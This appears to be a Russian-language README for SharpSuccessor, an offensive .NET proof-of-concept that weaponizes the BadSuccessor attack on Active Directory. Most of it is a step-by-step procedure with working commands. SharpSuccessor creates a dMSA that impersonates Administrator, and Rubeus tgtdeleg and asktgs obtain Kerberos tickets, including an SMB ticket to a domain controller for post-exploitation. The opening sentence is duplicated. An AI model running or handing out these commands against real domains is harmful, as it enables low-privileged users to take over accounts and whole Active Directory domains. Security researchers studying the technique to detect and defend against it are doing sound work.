
SharpSuccessor — это .NET Proof of Concept (POC) для полной weaponization атаки BadSuccessor Ювала Гордона (@YuG0rd) из Akamai.
SharpSuccessor — это .NET-доказательство концепции (POC) для полной эксплуатации атаки BadSuccessor Юваля Гордона (@YuG0rd) от Akamai. Пользователь с низкими привилегиями, обладающий разрешением CreateChild на любое организационное подразделение (OU) в домене Active Directory и правом записи на целевой объект, может захватить учётную запись.
Используйте SharpSuccessor, чтобы добавить и подготовить объект dMSA, а также записать нужные атрибуты на целевую учётную запись, которую вы хотите имитировать:
SharpSuccessor.exe add /impersonate:Administrator /path:"ou=test,dc=lab,dc=lan" /account:jdoe /name:attacker_dMSA

Запросите TGT в контексте текущего пользователя, в данном случае jdoe:
Rubeus.exe tgtdeleg /nowrap

Затем используйте этот tgt для имитации учётной записи dMSA:
Rubeus.exe asktgs /targetuser:attacker_dmsa$ /service:krbtgt/lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIFTDCCB.....

Теперь вы можете запросить сервисный билет в контексте Administrator для любого SPN, включая контроллеры домена, для пост-эксплуатации. Например, здесь я покажу привилегии администратора для SMB на контроллере домена:
Rubeus.exe asktgs /user:attacker_dmsa$ /service:cifs/WIN-RAEAN26UGJ5.lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIF2DCCBdS...

Теперь, когда у нас есть билет в памяти, мы можем проверить доступ:

Огромная благодарность Jim Sykora и Garrett Foster за вдохновение и помощь в создании этого инструмента!